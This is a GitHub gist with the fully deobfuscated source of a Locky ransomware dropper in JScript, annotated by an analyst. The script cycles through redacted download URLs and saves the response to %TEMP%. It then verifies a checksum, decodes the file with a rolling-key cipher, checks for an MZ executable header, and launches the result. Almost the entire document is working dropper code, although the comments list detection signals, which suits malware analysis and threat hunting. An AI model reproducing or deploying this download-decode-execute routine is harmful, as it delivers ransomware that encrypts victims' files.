
@cryptobioz
Created July 17, 2016 17:09
Locky dropper: fully deobfuscated file
<job><script language="JScript">
// Analyst summary of the main routine: pick an HTTP COM client, cycle through
// the download URLs, save the response to %TEMP%, decode it in place, and run it
// only if the decoded bytes pass a size check and an "MZ" header check.
// Hunting signals visible here: a script host instantiating HTTP and
// ADODB.Stream COM objects, an .exe written under %TEMP%, and a child process
// started from that path with the single argument "321".

// Drop location: the expanded %TEMP% directory plus a fixed file name.
var payload_path = WScript["CreateObject"]("WScript.Shell").ExpandEnvironmentStrings("%TEMP%/")+"E8ANs5ZfEe.exe";
// The real download URLs were redacted by the gist author.
var urls = ["http://XXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"];
// COM ProgIDs tried in order as the HTTP client.
// NOTE(review): the first entry does not look like a registered ProgID;
// presumably a leftover from deobfuscation - confirm against the original sample.
var http_methods = ["WinHttpRequest.(31143109).1", "MSXML2.XMLHTTP"];
// Keep the first COM object that can be created; creation failures are ignored.
for(var i=0;i<http_methods["length"];i++){
try{
var download_payload = WScript["CreateObject"](http_methods[i]);
break;
}catch(e){
continue;
}
};
// Loop flag and URL index. In this listing nothing assigns continuer a value
// other than 1 and there is no break after Run, so the loop is only left
// through the break in the inner catch below.
var continuer = 1;
var j = 0;
while(continuer){
try{
if(1 == continuer){
// After a full pass over the URL list, pause one second and start over.
if(j >= urls["length"]){
j = 0;
WScript["Sleep"](1000);
}
// Synchronous GET (third argument false) to the next URL in round-robin order.
download_payload["open"]("GET", urls[j++ % urls["length"]], false);
download_payload["send"]();
}
// Poll every 100 ms until the request reports readystate 4.
if(download_payload.readystate < 4){
WScript["Sleep"](100);
continue;
}
// Write the raw response body to disk through a binary stream (type 1).
// SaveToFile option 2 overwrites an existing file. At this point the file on
// disk is still the encoded download, not an executable.
var payload_file = WScript["CreateObject"]("ADODB.Stream");
payload_file["open"]();
payload_file["type"] = 1;
payload_file["write"](download_payload["ResponseBody"]);
payload_file["position"] = 0;
payload_file["SaveToFile"](payload_path, 2);
payload_file["close"]();
// Read the file back as an array of byte values and undo the encoding.
var payload_content = read_payload(payload_path);
payload_content = decrypt_payload(payload_content);
// Accept only a decoded payload of 102400..235520 bytes (100 KiB to 230 KiB)
// that starts with "MZ"; anything else moves on to the next URL. A failed
// checksum yields an empty array and is rejected by the length test.
if(payload_content["length"] < 102400 || payload_content["length"] > 235520 || !check_header(payload_content)){
continuer = 1;
continue;
}
// Overwrite the downloaded file with the decoded bytes; stop entirely if
// that write fails.
try{
save_decrypted_payload(payload_path, payload_content);
}catch(e){
break;
};
// Launch the decoded executable with the command-line argument "321".
WScript["CreateObject"]("WScript.Shell")["Run"](payload_path+" 321");
}catch(e){
// Any other failure (for example a request error): wait one second and retry.
WScript["Sleep"](1000);
continue;
}
}
// LYUo
// Loads the file at `arg` through a text-mode ADODB.Stream using charset "437"
// and returns the result of decode() on that text, i.e. an array of numeric
// byte values. Reading as code page 437 text and mapping the characters back
// is how the script gets at raw bytes without a binary API.
function read_payload(arg){
var Vt = WScript["CreateObject"]("ADODB.Stream");
// type 2 selects text mode; the charset must be set before the stream is loaded.
Vt["type"]=2;
Vt["Charset"] = "437";
Vt["open"]();
Vt["LoadFromFile"](arg);
// NOTE(review): ReadText is referenced without call parentheses; presumably
// the COM dispatch still returns the stream text here - confirm.
var k = Vt["ReadText"];
Vt["close"]();
return decode(k);
}
// NDn2
// Converts a string into an array of byte values. Characters with a code below
// 128 are kept as they are; every other character is looked up in a table that
// maps Unicode code points to the bytes 0x80..0xFF. The table matches the
// charset "437" used by read_payload and is the inverse of the one in encode().
// A code point missing from the table produces undefined in the output array.
function decode(arg){
// Lookup table: index = Unicode code point, value = byte 0x80..0xFF.
var HOAt1 = new Array();
HOAt1[0xC7]=0x80;
HOAt1[0xFC]=0x81;
HOAt1[0xE9]=0x82;
HOAt1[0xE2]=0x83;
HOAt1[0xE4]=0x84;
HOAt1[0xE0]=0x85;
HOAt1[0xE5]=0x86;
HOAt1[0xE7]=0x87;
HOAt1[0xEA]=0x88;
HOAt1[0xEB]=0x89;
HOAt1[0xE8]=0x8A;
HOAt1[0xEF]=0x8B;
HOAt1[0xEE]=0x8C;
HOAt1[0xEC]=0x8D;
HOAt1[0xC4]=0x8E;
HOAt1[0xC5]=0x8F;
HOAt1[0xC9]=0x90;
HOAt1[0xE6]=0x91;
HOAt1[0xC6]=0x92;
HOAt1[0xF4]=0x93;
HOAt1[0xF6]=0x94;
HOAt1[0xF2]=0x95;
HOAt1[0xFB]=0x96;
HOAt1[0xF9]=0x97;
HOAt1[0xFF]=0x98;
HOAt1[0xD6]=0x99;
HOAt1[0xDC]=0x9A;
HOAt1[0xA2]=0x9B;
HOAt1[0xA3]=0x9C;
HOAt1[0xA5]=0x9D;
HOAt1[0x20A7]=0x9E;
HOAt1[0x192]=0x9F;
HOAt1[0xE1]=0xA0;
HOAt1[0xED]=0xA1;
HOAt1[0xF3]=0xA2;
HOAt1[0xFA]=0xA3;
HOAt1[0xF1]=0xA4;
HOAt1[0xD1]=0xA5;
HOAt1[0xAA]=0xA6;
HOAt1[0xBA]=0xA7;
HOAt1[0xBF]=0xA8;
HOAt1[0x2310]=0xA9;
HOAt1[0xAC]=0xAA;
HOAt1[0xBD]=0xAB;
HOAt1[0xBC]=0xAC;
HOAt1[0xA1]=0xAD;
HOAt1[0xAB]=0xAE;
HOAt1[0xBB]=0xAF;
HOAt1[0x2591]=0xB0;
HOAt1[0x2592]=0xB1;
HOAt1[0x2593]=0xB2;
HOAt1[0x2502]=0xB3;
HOAt1[0x2524]=0xB4;
HOAt1[0x2561]=0xB5;
HOAt1[0x2562]=0xB6;
HOAt1[0x2556]=0xB7;
HOAt1[0x2555]=0xB8;
HOAt1[0x2563]=0xB9;
HOAt1[0x2551]=0xBA;
HOAt1[0x2557]=0xBB;
HOAt1[0x255D]=0xBC;
HOAt1[0x255C]=0xBD;
HOAt1[0x255B]=0xBE;
HOAt1[0x2510]=0xBF;
HOAt1[0x2514]=0xC0;
HOAt1[0x2534]=0xC1;
HOAt1[0x252C]=0xC2;
HOAt1[0x251C]=0xC3;
HOAt1[0x2500]=0xC4;
HOAt1[0x253C]=0xC5;
HOAt1[0x255E]=0xC6;
HOAt1[0x255F]=0xC7;
HOAt1[0x255A]=0xC8;
HOAt1[0x2554]=0xC9;
HOAt1[0x2569]=0xCA;
HOAt1[0x2566]=0xCB;
HOAt1[0x2560]=0xCC;
HOAt1[0x2550]=0xCD;
HOAt1[0x256C]=0xCE;
HOAt1[0x2567]=0xCF;
HOAt1[0x2568]=0xD0;
HOAt1[0x2564]=0xD1;
HOAt1[0x2565]=0xD2;
HOAt1[0x2559]=0xD3;
HOAt1[0x2558]=0xD4;
HOAt1[0x2552]=0xD5;
HOAt1[0x2553]=0xD6;
HOAt1[0x256B]=0xD7;
HOAt1[0x256A]=0xD8;
HOAt1[0x2518]=0xD9;
HOAt1[0x250C]=0xDA;
HOAt1[0x2588]=0xDB;
HOAt1[0x2584]=0xDC;
HOAt1[0x258C]=0xDD;
HOAt1[0x2590]=0xDE;
HOAt1[0x2580]=0xDF;
HOAt1[0x3B1]=0xE0;
HOAt1[0xDF]=0xE1;
HOAt1[0x393]=0xE2;
HOAt1[0x3C0]=0xE3;
HOAt1[0x3A3]=0xE4;
HOAt1[0x3C3]=0xE5;
HOAt1[0xB5]=0xE6;
HOAt1[0x3C4]=0xE7;
HOAt1[0x3A6]=0xE8;
HOAt1[0x398]=0xE9;
HOAt1[0x3A9]=0xEA;
HOAt1[0x3B4]=0xEB;
HOAt1[0x221E]=0xEC;
HOAt1[0x3C6]=0xED;
HOAt1[0x3B5]=0xEE;
HOAt1[0x2229]=0xEF;
HOAt1[0x2261]=0xF0;
HOAt1[0xB1]=0xF1;
HOAt1[0x2265]=0xF2;
HOAt1[0x2264]=0xF3;
HOAt1[0x2320]=0xF4;
HOAt1[0x2321]=0xF5;
HOAt1[0xF7]=0xF6;
HOAt1[0x2248]=0xF7;
HOAt1[0xB0]=0xF8;
HOAt1[0x2219]=0xF9;
HOAt1[0xB7]=0xFA;
HOAt1[0x221A]=0xFB;
HOAt1[0x207F]=0xFC;
HOAt1[0xB2]=0xFD;
HOAt1[0x25A0]=0xFE;
HOAt1[0xA0]=0xFF;
// Walk the string one UTF-16 unit at a time and collect one value per unit.
var arr2 = new Array();
for(var i = 0;i<arg["length"];i++){
var var2 = arg["charCodeAt"](i);
if(var2 < 128){
// The lower half of the range is passed through unchanged.
var var3 = var2;
}else{
var var3 = HOAt1[var2];
}
arr2["push"](var3);
};
return arr2;
};
// DTx
// Verifies and decodes the downloaded byte array `arg`, modifying it in place.
// Layout of the input: encoded body followed by a 4-byte little-endian checksum.
// Returns the decoded array, or an empty array when the checksum does not match.
// The same steps can be replayed offline on a captured response body to recover
// the executable for analysis.
function decrypt_payload(arg){
var v1;
// Stored checksum: the last four bytes combined little-endian
// ((-522 + 538) evaluates to 16, an obfuscation leftover).
var v2 = arg[arg["length"]-4] | arg[arg["length"]-3] << 8 | arg[arg["length"]-2] << (-522 + 538) | arg[arg["length"]-1] << 24;
// Remove the checksum trailer so only the encoded body remains.
arg["splice"](arg["length"]-4, 4);
// Computed checksum: 40 plus the sum of all body bytes, modulo 2^32.
v1 = 40;
for(var i=0;i<arg["length"];i++){
v1 = (v1 + arg[i]) % 0x100000000;
};
if(v1 != v2){
return [];
}
// Rolling key, starting at 30. v3 is assigned without var, so it becomes an
// implicit global.
v3 = 30;
// The body is stored back to front.
arg = arg.reverse();
for(var i = 0; i < arg["length"];i++){
// Subtract the current key from the byte, wrapping into 0..255.
var v4 = arg[i] - v3;
if(v4 < 0){
v4 += 0x100;
}
arg[i] = v4;
// The key advances by 55 (mod 256) after every byte.
v3 = (v3 + 55) % 256;
}
return arg;
}
// Xu9
// Returns true when the first two elements of `arg` are 0x4D 0x5A ("MZ"),
// the magic bytes at the start of a DOS/PE executable; false otherwise.
function check_header(arg){
if(arg[0] == 0x4D && arg[1] == 0x5a){
return true;
}else{
return false;
}
}
// QMg4
// Converts an array of byte values into a string, one character per element.
// Values below 128 become the character with that code; values 0x80..0xFF are
// mapped through a table to the matching Unicode code point. This is the
// inverse of decode() and pairs with the charset "437" text stream used in
// save_decrypted_payload.
function encode(arg){
// Lookup table: index = byte 0x80..0xFF, value = Unicode code point.
var BCm=new Array();
BCm[0x80]=0x00C7;
BCm[0x81]=0x00FC;
BCm[0x82]=0x00E9;
BCm[0x83]=0x00E2;
BCm[0x84]=0x00E4;
BCm[0x85]=0x00E0;
BCm[0x86]=0x00E5;
BCm[0x87]=0x00E7;
BCm[0x88]=0x00EA;
BCm[0x89]=0x00EB;
BCm[0x8A]=0x00E8;
BCm[0x8B]=0x00EF;
BCm[0x8C]=0x00EE;
BCm[0x8D]=0x00EC;
BCm[0x8E]=0x00C4;
BCm[0x8F]=0x00C5;
BCm[0x90]=0x00C9;
BCm[0x91]=0x00E6;
BCm[0x92]=0x00C6;
BCm[0x93]=0x00F4;
BCm[0x94]=0x00F6;
BCm[0x95]=0x00F2;
BCm[0x96]=0x00FB;
BCm[0x97]=0x00F9;
BCm[0x98]=0x00FF;
BCm[0x99]=0x00D6;
BCm[0x9A]=0x00DC;
BCm[0x9B]=0x00A2;
BCm[0x9C]=0x00A3;
BCm[0x9D]=0x00A5;
BCm[0x9E]=0x20A7;
BCm[0x9F]=0x0192;
BCm[0xA0]=0x00E1;
BCm[0xA1]=0x00ED;
BCm[0xA2]=0x00F3;
BCm[0xA3]=0x00FA;
BCm[0xA4]=0x00F1;
BCm[0xA5]=0x00D1;
BCm[0xA6]=0x00AA;
BCm[0xA7]=0x00BA;
BCm[0xA8]=0x00BF;
BCm[0xA9]=0x2310;
BCm[0xAA]=0x00AC;
BCm[0xAB]=0x00BD;
BCm[0xAC]=0x00BC;
BCm[0xAD]=0x00A1;
BCm[0xAE]=0x00AB;
BCm[0xAF]=0x00BB;
BCm[0xB0]=0x2591;
BCm[0xB1]=0x2592;
BCm[0xB2]=0x2593;
BCm[0xB3]=0x2502;
BCm[0xB4]=0x2524;
BCm[0xB5]=0x2561;
BCm[0xB6]=0x2562;
BCm[0xB7]=0x2556;
BCm[0xB8]=0x2555;
BCm[0xB9]=0x2563;
BCm[0xBA]=0x2551;
BCm[0xBB]=0x2557;
BCm[0xBC]=0x255D;
BCm[0xBD]=0x255C;
BCm[0xBE]=0x255B;
BCm[0xBF]=0x2510;
BCm[0xC0]=0x2514;
BCm[0xC1]=0x2534;
BCm[0xC2]=0x252C;
BCm[0xC3]=0x251C;
BCm[0xC4]=0x2500;
BCm[0xC5]=0x253C;
BCm[0xC6]=0x255E;
BCm[0xC7]=0x255F;
BCm[0xC8]=0x255A;
BCm[0xC9]=0x2554;
BCm[0xCA]=0x2569;
BCm[0xCB]=0x2566;
BCm[0xCC]=0x2560;
BCm[0xCD]=0x2550;
BCm[0xCE]=0x256C;
BCm[0xCF]=0x2567;
BCm[0xD0]=0x2568;
BCm[0xD1]=0x2564;
BCm[0xD2]=0x2565;
BCm[0xD3]=0x2559;
BCm[0xD4]=0x2558;
BCm[0xD5]=0x2552;
BCm[0xD6]=0x2553;
BCm[0xD7]=0x256B;
BCm[0xD8]=0x256A;
BCm[0xD9]=0x2518;
BCm[0xDA]=0x250C;
BCm[0xDB]=0x2588;
BCm[0xDC]=0x2584;
BCm[0xDD]=0x258C;
BCm[0xDE]=0x2590;
BCm[0xDF]=0x2580;
BCm[0xE0]=0x03B1;
BCm[0xE1]=0x00DF;
BCm[0xE2]=0x0393;
BCm[0xE3]=0x03C0;
BCm[0xE4]=0x03A3;
BCm[0xE5]=0x03C3;
BCm[0xE6]=0x00B5;
BCm[0xE7]=0x03C4;
BCm[0xE8]=0x03A6;
BCm[0xE9]=0x0398;
BCm[0xEA]=0x03A9;
BCm[0xEB]=0x03B4;
BCm[0xEC]=0x221E;
BCm[0xED]=0x03C6;
BCm[0xEE]=0x03B5;
BCm[0xEF]=0x2229;
BCm[0xF0]=0x2261;
BCm[0xF1]=0x00B1;
BCm[0xF2]=0x2265;
BCm[0xF3]=0x2264;
BCm[0xF4]=0x2320;
BCm[0xF5]=0x2321;
BCm[0xF6]=0x00F7;
BCm[0xF7]=0x2248;
BCm[0xF8]=0x00B0;
BCm[0xF9]=0x2219;
BCm[0xFA]=0x00B7;
BCm[0xFB]=0x221A;
BCm[0xFC]=0x207F;
BCm[0xFD]=0x00B2;
BCm[0xFE]=0x25A0;
BCm[0xFF]=0x00A0;
// Characters are collected in an array and joined once at the end.
var arr2 = new Array();
var v1 = "";
var v2;
var v3;
for(var i=0;i<arg["length"];i++){
v2 = arg[i];
if(v2 < 128){
// The lower half of the range is passed through unchanged.
v3 = v2;
}else{
v3 = BCm[v2];
}
arr2.push(String["fromCharCode"](v3));
}
v1 = arr2["join"]("");
return v1;
}
// LTs7
// Writes the byte array `payload_content` to `payload_path`, replacing the
// encoded download that the main routine saved there earlier. The bytes are
// turned into a string by encode() and written through a text-mode
// ADODB.Stream with charset "437"; presumably that charset converts each
// character back to a single byte on disk - confirm.
function save_decrypted_payload(payload_path, payload_content){
var Vt = WScript["CreateObject"]("ADODB.Stream");
// type 2 selects text mode.
Vt["type"] = 2;
Vt["Charset"] = "437";
Vt["open"]();
Vt["writeText"](encode(payload_content));
// Option 2 overwrites the existing file at payload_path.
Vt["SaveToFile"](payload_path, 2);
Vt["close"]();
};
</script></job>